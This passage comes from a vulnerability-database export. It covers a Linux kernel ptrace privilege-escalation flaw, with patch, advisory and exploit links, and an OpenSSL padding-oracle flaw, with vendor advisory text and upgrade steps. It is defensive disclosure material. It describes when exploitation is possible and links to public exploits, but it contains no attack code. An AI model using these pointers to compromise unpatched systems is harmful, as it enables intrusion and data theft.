        "db": "PACKETSTORM",
        "id": "154553",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154043"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "154245"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "id": "VAR-201907-1641",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.30555555
  },
  "last_update_date": "2026-04-10T22:28:24.329000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "ChangeLog-5.1.17",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.1.17"
      },
      {
        "title": "[SECURITY] [DLA 1862-1] linux security update",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00022.html"
      },
      {
        "title": "[SECURITY] [DLA 1863-1] linux-4.9 security update",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00023.html"
      },
      {
        "title": "DSA-4484",
        "trust": 0.8,
        "url": "https://www.debian.org/security/2019/dsa-4484"
      },
      {
        "title": "FEDORA-2019-a95015e60f",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGRK5LYWBJ4E4SRI4DKX367NHYSI3VOH/"
      },
      {
        "title": "ptrace: Fix -\u003eptracer_cred handling for PTRACE_TRACEME",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "ptrace: Fix -\u003eptracer_cred handling for PTRACE_TRACEME",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192411 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192405 - Security Advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-4484-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=f7aec913c227117e479ebfa6af2b1b9a"
      },
      {
        "title": "Red Hat: CVE-2019-13272",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2019-13272"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-hwe, linux-azure, linux-gcp, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4093-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4095-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4117-1"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel vulnerabilities affect IBM Spectrum Protect Plus CVE-2019-10140, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-13233, CVE-2019-13272, CVE-2019-14283, CVE-2019-14284, CVE-2019-15090, CVE-2019-15807, CVE-2019-15925",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d9cd8f6d11c68af77f2f2bd27ca37bed"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4094-1"
      },
      {
        "title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (March 2021)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=afc44ca312a83d419e062241c4789aae"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4118-1"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "CVE-2019-13272 - Pkexec Local Privilege Escalation",
        "trust": 0.1,
        "url": "https://github.com/asepsaepdin/CVE-2019-13272 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.4,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730895"
      },
      {
        "trust": 2.4,
        "url": "https://bugzilla.suse.com/show_bug.cgi?id=1140671"
      },
      {
        "trust": 2.4,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1903"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/165051/linux-kernel-5.1.x-ptrace_traceme-pkexec-local-privilege-escalation.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/153663/linux-ptrace_traceme-broken-permission-object-lifetime-handling.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/156929/linux-ptrace_traceme-local-root.html"
      },
      {
        "trust": 2.2,
        "url": "https://www.debian.org/security/2019/dsa-4484"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/153702/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 2.2,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00023.html"
      },
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13272"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:2405"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:2809"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154957/linux-polkit-pkexec-helper-ptrace_traceme-local-root.html"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20190806-0001/"
      },
      {
        "trust": 1.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.1.17"
      },
      {
        "trust": 1.6,
        "url": "https://support.f5.com/csp/article/k91025336"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00022.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/jul/30"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4094-1/"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/jul/33"
      },
      {
        "trust": 1.6,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4117-1/"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4093-1/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:2411"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4095-1/"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154245/kernel-live-patch-security-notice-lsn-0054-1.html"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4118-1/"
      },
      {
        "trust": 1.0,
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2019-13272"
      },
      {
        "trust": 1.0,
        "url": "https://support.f5.com/csp/article/k91025336?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ogrk5lywbj4e4sri4dkx367nhysi3voh/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13272"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ogrk5lywbj4e4sri4dkx367nhysi3voh/"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k91025336?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193255-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193252-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193249-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193248-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193247-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193258-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193260-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193261-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193263-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193246-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2704/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2749/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4646/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-29592"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50541"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/47133"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-ptrace-link-29820"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/47163"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153663/linux-ptrace/traceme-broken-permission-object-lifetime-handling.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12984"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1125"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13272"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12818"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2101"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13233"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12819"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1125"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/4329821"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16862"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2024"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1021.23"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14610"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1050.57"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1040.42~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1021.23~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14609"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13093"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20169"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14614"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1043.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1042.42"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13053"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1040.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1040.42"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4094-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1055.60"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-58.64"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13099"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-58.64~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20511"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1060.66"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13100"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13096"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14613"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14617"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5383"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4117-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1014.16"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1129"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6974"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6974"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5489"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154043"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "154245"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "153699",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "153970",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154043",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154316",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154245",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154553",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2019-07-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-13272",
        "ident": null
      },
      {
        "date": "2019-07-20T19:11:11",
        "db": "PACKETSTORM",
        "id": "153699",
        "ident": null
      },
      {
        "date": "2019-08-07T20:10:41",
        "db": "PACKETSTORM",
        "id": "153970",
        "ident": null
      },
      {
        "date": "2019-08-13T17:45:00",
        "db": "PACKETSTORM",
        "id": "154043",
        "ident": null
      },
      {
        "date": "2019-09-02T23:48:33",
        "db": "PACKETSTORM",
        "id": "154316",
        "ident": null
      },
      {
        "date": "2019-08-28T23:02:22",
        "db": "PACKETSTORM",
        "id": "154245",
        "ident": null
      },
      {
        "date": "2019-09-20T15:08:09",
        "db": "PACKETSTORM",
        "id": "154553",
        "ident": null
      },
      {
        "date": "2019-07-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201907-809",
        "ident": null
      },
      {
        "date": "2019-07-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-006727",
        "ident": null
      },
      {
        "date": "2019-07-17T13:15:10.687000",
        "db": "NVD",
        "id": "CVE-2019-13272",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-13272",
        "ident": null
      },
      {
        "date": "2021-11-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201907-809",
        "ident": null
      },
      {
        "date": "2019-07-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-006727",
        "ident": null
      },
      {
        "date": "2025-11-06T16:51:07.910000",
        "db": "NVD",
        "id": "CVE-2019-13272",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "154043"
      },
      {
        "db": "PACKETSTORM",
        "id": "154245"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "_id": null,
    "data": "Linux Kernel Vulnerabilities related to authorization, permissions, and access control",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      }
    ],
    "trust": 0.6
  }
}

VAR-201902-0192

Vulnerability from variot - Updated: 2026-04-10 22:22

If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable "non-stitched" ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). Fixed in OpenSSL 1.0.2r (Affected 1.0.2-1.0.2q). OpenSSL Contains an information disclosure vulnerability.Information may be obtained. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. A vulnerability in OpenSSL could allow an unauthenticated, remote malicious user to access sensitive information on a targeted system. An attacker who is able to perform man-in-the-middle attacks could exploit the vulnerability by persuading a user to access a link that submits malicious input to the affected software. A successful exploit could allow the malicious user to intercept and modify the browser requests and then observe the server behavior in order to conduct a padding oracle attack and decrypt sensitive information.

This issue was discovered by Juraj Somorovsky, Robert Merget and Nimrod Aviram, with additional investigation by Steven Collison and Andrew Hourselt. It was reported to OpenSSL on 10th December 2018.

Note: Advisory updated to make it clearer that AEAD ciphersuites are not impacted.

Note

OpenSSL 1.0.2 and 1.1.0 are currently only receiving security updates. Support for 1.0.2 will end on 31st December 2019. Support for 1.1.0 will end on 11th September 2019. Users of these versions should upgrade to OpenSSL 1.1.1.

References

URL for this Security Advisory: https://www.openssl.org/news/secadv/20190226.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html . Description:

The RHV-M Virtual Appliance automates the process of installing and configuring the Red Hat Virtualization Manager. The appliance is available to download as an OVA file from the Customer Portal.

The following packages have been upgraded to a later upstream version: rhvm-appliance (4.3).

For the stable distribution (stretch), this problem has been fixed in version 1.0.2r-1~deb9u1.

We recommend that you upgrade your openssl1.0 packages.

For the detailed security status of openssl1.0 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl1.0

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlx4WgkACgkQEMKTtsN8 TjZZCQ//UdQ3Bi/ZSQJ2yzW7MkbuaHla53iUhztTy2Zrype++NX4tXqqBl+xY9Eu 1D747Y1c2GZ949UaPbIvp8wLCvvxR5A4Tmx4sU3ZOOHXrlsZ5loYg66MslGUOMOU z7zaqXTg3as8wfD6ND5Zd4tP0iLyst8Vyi0W7PuFovLoPAc3/XcMaXghSwabs+JY 3KZuB4UlbOiEnO+6Mf5ghWQYBtN7y/QAVNWREfLmhpx2UY8F7Ia28bR9pXknxkl5 RuN9WH2BtXI4/JiL0TlkAua51NE+vXciPv+Dh4gkQNPWF/rfL9IL5AxjrgojysHf OhZaDcYpOPCXZmiA49JOXJOrIw73Zd9NZmgA1ZXQY1ECQDJ8dB9mSJj1KsUId+Id eTbRRbWwpzSQd5qc4h4NKjeIwA04a3JecDibD3pwf3+qn9sw8xQ/rfAl2byGRbEN FUDT65AIw4CFQDJeIE/vBZqCFhY2aIbRoibpZnp0XsROkw8xKQiH0Kgo7gjsoozT wHYK/rlvaZwbnLG7E8pUUj9Xr8OM9Wn/y7kzyHVekGUcDef3F1pPJ9CYsdppx+Zv MkoFNxc9GZ+Kn2i4l14I3hvwQ4Sy3owNjnTYFQ28yd+MRZoMw+nyXW1i7OCu+KFH 7OQkd5qNDh8iotsaUKT0DQOOL74UDgEPv2x02ahujRl+I3YDDdM=NRWo -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-4376-2 July 09, 2020

openssl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 ESM
Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in OpenSSL. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.

Original advisory details:

Cesar Pereida Garc\xeda, Sohaib ul Hassan, Nicola Tuveri, Iaroslav Gridin, Alejandro Cabrera Aldaya, and Billy Brumley discovered that OpenSSL incorrectly handled ECDSA signatures. An attacker could possibly use this issue to perform a timing side-channel attack and recover private ECDSA keys. A remote attacker could possibly use this issue to decrypt data. (CVE-2019-1559)

Bernd Edlinger discovered that OpenSSL incorrectly handled certain decryption functions. (CVE-2019-1563)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: libssl1.0.0 1.0.1f-1ubuntu2.27+esm1

Ubuntu 12.04 ESM: libssl1.0.0 1.0.1-4ubuntu5.44

After a standard system update you need to reboot your computer to make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201903-10

                                       https://security.gentoo.org/

Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: March 14, 2019 Bugs: #673056, #678564 ID: 201903-10

Synopsis

Multiple Information Disclosure vulnerabilities in OpenSSL allow attackers to obtain sensitive information.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 dev-libs/openssl < 1.0.2r >= 1.0.2r

Description

Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details.

Impact

A remote attacker to obtain sensitive information, caused by the failure to immediately close the TCP connection after the hosts encounter a zero-length record with valid padding.

A local attacker could run a malicious process next to legitimate processes using the architectureas parallel thread running capabilities to leak encrypted data from the CPU's internal processes.

Workaround

There is no known workaround at this time.

Resolution

All OpenSSL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2r"

References

